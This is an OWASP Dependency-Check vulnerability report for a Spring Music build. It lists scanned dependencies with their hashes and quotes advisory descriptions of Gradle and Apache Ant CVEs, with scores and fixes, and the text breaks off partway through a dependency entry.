Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies;
false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and
the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties,
implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided
is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever
arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.
Scan Information (
show all ):
dependency-check version : 12.1.3Report Generated On : Sun, 20 Jul 2025 01:54:42 GMTDependencies Scanned : 412 (376 unique)Vulnerable Dependencies : 53 Vulnerabilities Found : 479Vulnerabilities Suppressed : 0 ... NVD API Last Checked : 2025-07-19T11:38:01ZNVD API Last Modified : 2025-07-19T11:15:22ZNVD Cache Last Checked : 2025-07-19T11:38:01ZNVD Cache Last Modified : 2025-07-19T11:15:22ZSummary Summary of Vulnerable Dependencies (click to show all)
* indicates the dependency has a known exploited vulnerability
albums.jsFile Path: /github/workspace/build/resources/main/static/js/albums.jsMD5: b6df3deaf2b0bff56b50ca6fd50d71efSHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93aSHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332
Evidence Type Source Name Value Confidence
Related Dependencies albums.jsFile Path: /github/workspace/src/main/resources/static/js/albums.js MD5: b6df3deaf2b0bff56b50ca6fd50d71ef SHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93a SHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332 spring-music-sqldb-1.0.jar: albums.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/albums.js MD5: b6df3deaf2b0bff56b50ca6fd50d71ef SHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93a SHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332 app.jsFile Path: /github/workspace/build/resources/main/static/js/app.jsMD5: c56a39bb605832ad75abebdc4b700585SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142
Evidence Type Source Name Value Confidence
Related Dependencies app.jsFile Path: /github/workspace/src/main/resources/static/js/app.js MD5: c56a39bb605832ad75abebdc4b700585 SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45 SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142 spring-music-sqldb-1.0.jar: app.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/app.js MD5: c56a39bb605832ad75abebdc4b700585 SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45 SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142 errors.jsFile Path: /github/workspace/build/resources/main/static/js/errors.jsMD5: 22ba03b9ba7a4deab4d4545bd02b464cSHA1: f31d03be28698f9450bc1609ba37034f30665d57SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35
Evidence Type Source Name Value Confidence
Related Dependencies errors.jsFile Path: /github/workspace/src/main/resources/static/js/errors.js MD5: 22ba03b9ba7a4deab4d4545bd02b464c SHA1: f31d03be28698f9450bc1609ba37034f30665d57 SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35 spring-music-sqldb-1.0.jar: errors.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/errors.js MD5: 22ba03b9ba7a4deab4d4545bd02b464c SHA1: f31d03be28698f9450bc1609ba37034f30665d57 SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35 gradle-wrapper.jarFile Path: /github/workspace/gradle/wrapper/gradle-wrapper.jarMD5: 83e4276503aa8ca4e50b4221e406c214SHA1: 9454732292541339b18084df0bdba55b027af937SHA256: 88b5b31f390a268ab3773df580d83fd1e388f49c2b685f78a16600577bd72fe2
Evidence Type Source Name Value Confidence Vendor file name gradle-wrapper High Vendor jar package name cli Low Vendor jar package name gradle Low Product file name gradle-wrapper High Product jar package name cli Low Product jar package name gradle Highest Product Manifest Implementation-Title Gradle High Version Manifest Implementation-Version 4.4 High
CVE-2019-15052 suppress
The HTTP client in Gradle before 5.6 sends authentication credentials originally destined for the configured host. If that host returns a 30x redirect, Gradle also sends those credentials to all subsequent hosts that the request redirects to. This is similar to CVE-2018-1000007. CWE-522 Insufficiently Protected Credentials
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions:
CVE-2023-35947 suppress
Gradle is a build tool with a focus on build automation and support for multi-language development. In affected versions when unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions. For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read. To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name. Users are advised to upgrade. There are no known workarounds for this vulnerability.
### Impact
This is a path traversal vulnerability when Gradle deals with Tar archives, often referenced as TarSlip, a variant of ZipSlip.
* When unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions.
* For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read.
To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed.
Gradle uses Tar archives for its [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html). These archives are safe when created by Gradle. But if an attacker had control of a remote build cache server, they could inject malicious build cache entries that leverage this vulnerability. This attack vector could also be exploited if a man-in-the-middle can be performed between the remote cache and the build.
### Patches
A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name.
It is recommended that users upgrade to a patched version.
### Workarounds
There is no workaround.
* If your build deals with Tar archives that you do not fully trust, you need to inspect them to confirm they do not attempt to leverage this vulnerability.
* If you use the Gradle remote build cache, make sure only trusted parties have write access to it and that connections to the remote cache are properly secured.
### References
* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](https://cwe.mitre.org/data/definitions/22.html)
* [Gradle Build Cache](https://docs.gradle.org/current/userguide/build_cache.html)
* [ZipSlip](https://security.snyk.io/research/zip-slip-vulnerability) CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-29428 suppress
In Gradle before version 7.0, on Unix-like systems, the system temporary directory can be created with open permissions that allow multiple users to create and delete files within it. Gradle builds could be vulnerable to a local privilege escalation from an attacker quickly deleting and recreating files in the system temporary directory. This vulnerability impacted builds using precompiled script plugins written in Kotlin DSL and tests for Gradle plugins written using ProjectBuilder or TestKit. If you are on Windows or modern versions of macOS, you are not vulnerable. If you are on a Unix-like operating system with the "sticky" bit set on your system temporary directory, you are not vulnerable. The problem has been patched and released with Gradle 7.0. As a workaround, on Unix-like operating systems, ensure that the "sticky" bit is set. This only allows the original user (or root) to delete a file. If you are unable to change the permissions of the system temporary directory, you can move the Java temporary directory by setting the System Property `java.io.tmpdir`. The new path needs to limit permissions to the build user only. For additional details refer to the referenced GitHub Security Advisory. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-11979 suppress
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process. CWE-379 Creation of Temporary File in Directory with Insecure Permissions, NVD-CWE-Other
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-32751 suppress
Gradle is a build tool with a focus on build automation. In versions prior to 7.2, start scripts generated by the `application` plugin and the `gradlew` script are both vulnerable to arbitrary code execution when an attacker is able to change environment variables for the user running the script. This may impact those who use `gradlew` on Unix-like systems or use the scripts generated by Gradle in thieir application on Unix-like systems. For this vulnerability to be exploitable, an attacker needs to be able to set the value of particular environment variables and have those environment variables be seen by the vulnerable scripts. This issue has been patched in Gradle 7.2 by removing the use of `eval` and requiring the use of the `bash` shell. There are a few workarounds available. For CI/CD systems using the Gradle build tool, one may ensure that untrusted users are unable to change environment variables for the user that executes `gradlew`. If one is unable to upgrade to Gradle 7.2, one may generate a new `gradlew` script with Gradle 7.2 and use it for older versions of Gradle. Fpplications using start scripts generated by Gradle, one may ensure that untrusted users are unable to change environment variables for the user that executes the start script. A vulnerable start script could be manually patched to remove the use of `eval` or the use of environment variables that affect the application's command-line. If the application is simple enough, one may be able to avoid the use of the start scripts by running the application directly with Java command. CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (8.5) Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C References:
Vulnerable Software & Versions:
CVE-2023-44387 suppress
Gradle is a build tool with a focus on build automation and support for multi-language development. When copying or archiving symlinked files, Gradle resolves them but applies the permissions of the symlink itself instead of the permissions of the linked file to the resulting file. This leads to files having too much permissions given that symlinks usually are world readable and writeable. While it is unlikely this results in a direct vulnerability for the impacted build, it may open up attack vectors depending on where build artifacts end up being copied to or un-archived. In versions 7.6.3, 8.4 and above, Gradle will now properly use the permissions of the file pointed at by the symlink to set permissions of the copied or archived file. CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:2.0/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-11065 suppress
Gradle versions from 1.4 to 5.3.1 use an insecure HTTP URL to download dependencies when the built-in JavaScript or CoffeeScript Gradle plugins are used. Dependency artifacts could have been maliciously compromised by a MITM attack against the ajax.googleapis.com web site. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
CVE-2019-16370 suppress
The PGP signing plugin in Gradle before 6.0 relies on the SHA-1 algorithm, which might allow an attacker to replace an artifact with a different one that has the same SHA-1 message digest, a related issue to CVE-2005-4900. CWE-327 Use of a Broken or Risky Cryptographic Algorithm
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2021-29429 suppress
In Gradle before version 7.0, files created with open permissions in the system temporary directory can allow an attacker to access information downloaded by Gradle. Some builds could be vulnerable to a local information disclosure. Remote files accessed through TextResourceFactory are downloaded into the system temporary directory first. Sensitive information contained in these files can be exposed to other local users on the same system. If you do not use the `TextResourceFactory` API, you are not vulnerable. As of Gradle 7.0, uses of the system temporary directory have been moved to the Gradle User Home directory. By default, this directory is restricted to the user running the build. As a workaround, set a more restrictive umask that removes read access to other users. When files are created in the system temporary directory, they will not be accessible to other users. If you are unable to change your system's umask, you can move the Java temporary directory by setting the System Property `java.io.tmpdir`. The new path needs to limit permissions to the build user only. CWE-377 Insecure Temporary File
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-35946 suppress
Gradle is a build tool with a focus on build automation and support for multi-language development. When Gradle writes a dependency into its dependency cache, it uses the dependency's coordinates to compute a file location. With specially crafted dependency coordinates, Gradle can be made to write files into an unintended location. The file may be written outside the dependency cache or over another file in the dependency cache. This vulnerability could be used to poison the dependency cache or overwrite important files elsewhere on the filesystem where the Gradle process has write permissions. Exploiting this vulnerability requires an attacker to have control over a dependency repository used by the Gradle build or have the ability to modify the build's configuration. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Gradle will refuse to cache dependencies that have path traversal elements in their dependency coordinates. It is recommended that users upgrade to a patched version. If you are unable to upgrade to Gradle 7.6.2 or 8.2, `dependency verification` will make this vulnerability more difficult to exploit. CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-42445 suppress
Gradle is a build tool with a focus on build automation and support for multi-language development. In some cases, when Gradle parses XML files, resolving XML external entities is not disabled. Combined with an Out Of Band XXE attack (OOB-XXE), just parsing XML can lead to exfiltration of local text files to a remote server. Gradle parses XML files for several purposes. Most of the time, Gradle parses XML files it generated or were already present locally. Only Ivy XML descriptors and Maven POM files can be fetched from remote repositories and parsed by Gradle. In Gradle 7.6.3 and 8.4, resolving XML external entities has been disabled for all use cases to protect against this vulnerability. Gradle will now refuse to parse XML files that have XML external entities. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:1.6/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
info.jsFile Path: /github/workspace/build/resources/main/static/js/info.jsMD5: 26f4537eebc0c44b3b5768822f588bd4SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360
Evidence Type Source Name Value Confidence
Related Dependencies info.jsFile Path: /github/workspace/src/main/resources/static/js/info.js MD5: 26f4537eebc0c44b3b5768822f588bd4 SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324 SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360 spring-music-sqldb-1.0.jar: info.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/info.js MD5: 26f4537eebc0c44b3b5768822f588bd4 SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324 SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360 jacocoagent.jar (shaded: org.jacoco:org.jacoco.agent.rt:0.8.9)Description:
JaCoCo Java Agent File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jar/META-INF/maven/org.jacoco/org.jacoco.agent.rt/pom.xmlMD5: 06f8be91bf1dee590f62342c16f4cb5eSHA1: b76c6513056458a597ff2fee17812306d1517b1dSHA256: d1e4d1e96612c192aa62af1e4fb053720b74b890d38b5cec03bc4a0fa62b58b2
Evidence Type Source Name Value Confidence Vendor pom artifactid jacoco.agent.rt Low Vendor pom groupid org.jacoco Highest Vendor pom name JaCoCo :: Agent RT High Vendor pom parent-artifactid org.jacoco.build Low Product pom artifactid jacoco.agent.rt Highest Product pom groupid org.jacoco Highest Product pom name JaCoCo :: Agent RT High Product pom parent-artifactid org.jacoco.build Medium Version pom version 0.8.9 Highest
jacocoagent.jar (shaded: org.jacoco:org.jacoco.core:0.8.9)Description:
JaCoCo Core File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jar/META-INF/maven/org.jacoco/org.jacoco.core/pom.xmlMD5: a289ecd9035330a8892a80e3eb53c046SHA1: 04abbbb943140ca9f7f6c029eb554c38b7f40c1fSHA256: 5404f7052765a64374d275367fd9485bb5996b369113c89a8557d8f024810f02
Evidence Type Source Name Value Confidence Vendor pom artifactid jacoco.core Low Vendor pom groupid org.jacoco Highest Vendor pom name JaCoCo :: Core High Vendor pom parent-artifactid org.jacoco.build Low Product pom artifactid jacoco.core Highest Product pom groupid org.jacoco Highest Product pom name JaCoCo :: Core High Product pom parent-artifactid org.jacoco.build Medium Version pom version 0.8.9 Highest
jacocoagent.jarDescription:
JaCoCo Agent File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jarMD5: e852c5e07bc13ffdc6a68303799f80adSHA1: ad836d1c585c7e1dbf5cf828efa34528d9700303SHA256: 191734a0b7ef97606e6a09ae584c4acab47eb30fcb4c555d3d440d4e0d71d73d
Evidence Type Source Name Value Confidence Vendor central artifactid org.jacoco.agent Highest Vendor central groupid org.jacoco Highest Vendor file name jacocoagent High Vendor jar package name agent Highest Vendor jar package name agent Low Vendor jar package name jacoco Highest Vendor jar package name jacoco Low Vendor jar package name rt Highest Vendor jar package name rt Low Vendor Manifest automatic-module-name org.jacoco.agent.rt Medium Vendor Manifest Implementation-Vendor Mountainminds GmbH & Co. KG High Vendor pom artifactid jacoco.agent Low Vendor pom groupid org.jacoco Highest Vendor pom name JaCoCo :: Agent High Vendor pom parent-artifactid org.jacoco.build Low Product central artifactid org.jacoco.agent Highest Product file name jacocoagent High Product jar package name agent Highest Product jar package name agent Low Product jar package name internal_4481564 Low Product jar package name jacoco Highest Product jar package name rt Highest Product jar package name rt Low Product Manifest automatic-module-name org.jacoco.agent.rt Medium Product Manifest Implementation-Title JaCoCo Java Agent High Product pom artifactid jacoco.agent Highest Product pom groupid org.jacoco Highest Product pom name JaCoCo :: Agent High Product pom parent-artifactid org.jacoco.build Medium Version central version 0.8.9 Highest Version Manifest Implementation-Version 0.8.9 High Version pom version 0.8.9 Highest
prettify.jsFile Path: /github/workspace/build/reports/jacoco/test/html/jacoco-resources/prettify.jsMD5: 4b337aaa3c606cfc1a6ff1986db2c8cbSHA1: 290093755739da933c180ae7e7ebf283724dad1dSHA256: 743c6c4cab9499cd0bfe18a5a62281eccce843f47ec75eedb32eeb29c755aa68
Evidence Type Source Name Value Confidence
report.jsFile Path: /github/workspace/build/reports/tests/test/js/report.jsMD5: de20378567ed128a8084bb84fa9a704cSHA1: e00fae3553098953945837c2dce0634b35ab1932SHA256: fc89c6d002d18f4662065c9887b2cda8f8486f2737d4ad0f2fdeac0ad58a44dc
Evidence Type Source Name Value Confidence
sort.jsFile Path: /github/workspace/build/reports/jacoco/test/html/jacoco-resources/sort.jsMD5: d101d06d26e7deaf2b224e0d2137509aSHA1: 2c715325b546adf5beff3d624ce002a7256e3efeSHA256: 7ff293dabc89d68e33d5611f2de0dbbbcfed7e0177726fab5f9dcc0b91f593af
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jarMD5: 9399b9a2ee7605612929440071956bd3SHA1: 480c4de8ee58776b45a92907c15c8ea5523d318dSHA256: 572d327d25e8fba4d656f49415e70b7657c3424e63bf440c305a2305ef6cf43f
Evidence Type Source Name Value Confidence Vendor file name spring-music-sqldb High Vendor jar package name boot Low Vendor jar package name loader Low Vendor jar package name springframework Low Product file name spring-music-sqldb High Product jar package name boot Low Product jar package name loader Low Version file name spring-music-sqldb Medium Version file version 1.0 High
spring-music-sqldb-1.0.jar: HdrHistogram-2.1.10.jarDescription:
HdrHistogram supports the recording and analyzing sampled data value
counts across a configurable integer value range with configurable value
precision within the range. Value precision is expressed as the number of
significant digits in the value recording, and provides control over value
quantization behavior across the value range and the subsequent value
resolution at any given level.
License:
Public Domain, per Creative Commons CC0: http://creativecommons.org/publicdomain/zero/1.0/
BSD-2-Clause: https://opensource.org/licenses/BSD-2-Clause File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/HdrHistogram-2.1.10.jar
MD5: f7fd592029a3f8cc3b3c2488d43c6d8d
SHA1: 9e1ac84eed220281841b75e72fb9de5a297fbf04
SHA256: 6a65119ee9372e58b490e889e9f8293802efd3bbc2549dd47b6e1259cd12402c
Evidence Type Source Name Value Confidence Vendor file name HdrHistogram High Vendor jar package name hdrhistogram Highest Vendor Manifest bundle-symbolicname org.hdrhistogram.HdrHistogram Medium Vendor Manifest Implementation-Vendor-Id org.hdrhistogram Medium Vendor pom artifactid HdrHistogram Low Vendor pom developer id giltene Medium Vendor pom developer name Gil Tene Medium Vendor pom groupid org.hdrhistogram Highest Vendor pom name HdrHistogram High Vendor pom url http://hdrhistogram.github.io/HdrHistogram/ Highest Product file name HdrHistogram High Product jar package name hdrhistogram Highest Product Manifest Bundle-Name HdrHistogram Medium Product Manifest bundle-symbolicname org.hdrhistogram.HdrHistogram Medium Product Manifest Implementation-Title HdrHistogram High Product Manifest specification-title HdrHistogram Medium Product pom artifactid HdrHistogram Highest Product pom developer id giltene Low Product pom developer name Gil Tene Low Product pom groupid org.hdrhistogram Highest Product pom name HdrHistogram High Product pom url http://hdrhistogram.github.io/HdrHistogram/ Medium Version file version 2.1.10 High Version Manifest Bundle-Version 2.1.10 High Version Manifest Implementation-Version 2.1.10 High Version pom version 2.1.10 Highest
spring-music-sqldb-1.0.jar: HikariCP-2.7.8.jarDescription:
Ultimate JDBC Connection Pool License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/HikariCP-2.7.8.jar
MD5: 2066841de0d44c07a9d1b502f1b6cf94
SHA1: 4a3a604fa2efa89621aa498d04e000b2bed90c39
SHA256: 9e6a79789bcd46ccffe1fc5a92be2b7b94ddc7f538c32f01952536b22d23fd96
Evidence Type Source Name Value Confidence Vendor file name HikariCP High Vendor jar package name hikari Highest Vendor jar package name pool Highest Vendor jar package name zaxxer Highest Vendor Manifest automatic-module-name com.zaxxer.hikari Medium Vendor Manifest bundle-docurl https://github.com/brettwooldridge Low Vendor Manifest bundle-symbolicname com.zaxxer.HikariCP Medium Vendor pom artifactid HikariCP Low Vendor pom developer email brett.wooldridge@gmail.com Low Vendor pom developer name Brett Wooldridge Medium Vendor pom groupid com.zaxxer Highest Vendor pom name HikariCP High Vendor pom organization name Zaxxer.com High Vendor pom organization url brettwooldridge Medium Vendor pom url brettwooldridge/HikariCP Highest Product file name HikariCP High Product jar package name hikari Highest Product jar package name pool Highest Product jar package name zaxxer Highest Product Manifest automatic-module-name com.zaxxer.hikari Medium Product Manifest bundle-docurl https://github.com/brettwooldridge Low Product Manifest Bundle-Name HikariCP Medium Product Manifest bundle-symbolicname com.zaxxer.HikariCP Medium Product pom artifactid HikariCP Highest Product pom developer email brett.wooldridge@gmail.com Low Product pom developer name Brett Wooldridge Low Product pom groupid com.zaxxer Highest Product pom name HikariCP High Product pom organization name Zaxxer.com Low Product pom url brettwooldridge High Product pom url brettwooldridge/HikariCP High Version file version 2.7.8 High Version Manifest Bundle-Version 2.7.8 High Version pom version 2.7.8 Highest
spring-music-sqldb-1.0.jar: LatencyUtils-2.0.3.jarDescription:
LatencyUtils is a package that provides latency recording and reporting utilities.
License:
Public Domain, per Creative Commons CC0: http://creativecommons.org/publicdomain/zero/1.0/ File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/LatencyUtils-2.0.3.jar
MD5: 2ad12e1ef7614cecfb0483fa9ac6da73
SHA1: 769c0b82cb2421c8256300e907298a9410a2a3d3
SHA256: a32a9ffa06b2f4e01c5360f8f9df7bc5d9454a5d373cd8f361347fa5a57165ec
Evidence Type Source Name Value Confidence Vendor file name LatencyUtils High Vendor jar package name latencyutils Highest Vendor jar package name latencyutils Low Vendor pom artifactid LatencyUtils Low Vendor pom developer id giltene Medium Vendor pom developer name Gil Tene Medium Vendor pom groupid org.latencyutils Highest Vendor pom name LatencyUtils High Vendor pom url http://latencyutils.github.io/LatencyUtils/ Highest Product file name LatencyUtils High Product jar package name latencyutils Highest Product pom artifactid LatencyUtils Highest Product pom developer id giltene Low Product pom developer name Gil Tene Low Product pom groupid org.latencyutils Highest Product pom name LatencyUtils High Product pom url http://latencyutils.github.io/LatencyUtils/ Medium Version file version 2.0.3 High Version pom version 2.0.3 Highest
spring-music-sqldb-1.0.jar: activation-1.1.jarDescription:
JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).
License:
Common Development and Distribution License (CDDL) v1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/activation-1.1.jar
MD5: 8ae38e87cd4f86059c0294a8fe3e0b18
SHA1: e6cb541461c2834bdea3eb920f1884d1eb508b50
SHA256: 2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3
Evidence Type Source Name Value Confidence Vendor central artifactid activation Highest Vendor central groupid javax.activation Highest Vendor file name activation High Vendor jar package name activation Highest Vendor jar package name activation Low Vendor jar package name javax Highest Vendor jar package name javax Low Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest extension-name javax.activation Medium Vendor Manifest Implementation-Vendor Sun Microsystems, Inc. High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest specification-vendor Sun Microsystems, Inc. Low Vendor pom artifactid activation Low Vendor pom groupid javax.activation Highest Vendor pom name JavaBeans Activation Framework (JAF) High Vendor pom url http://java.sun.com/products/javabeans/jaf/index.jsp Highest Product central artifactid activation Highest Product file name activation High Product jar package name activation Highest Product jar package name activation Low Product jar package name javax Highest Product Manifest extension-name javax.activation Medium Product Manifest specification-title JavaBeans(TM) Activation Framework Specification Medium Product pom artifactid activation Highest Product pom groupid javax.activation Highest Product pom name JavaBeans Activation Framework (JAF) High Product pom url http://java.sun.com/products/javabeans/jaf/index.jsp Medium Version central version 1.1 Highest Version file version 1.1 High Version Manifest Implementation-Version 1.1 High Version pom version 1.1 Highest
spring-music-sqldb-1.0.jar: adal4j-1.6.0.jarDescription:
Azure active directory library for Java gives you the ability to add Windows Azure Active Directory
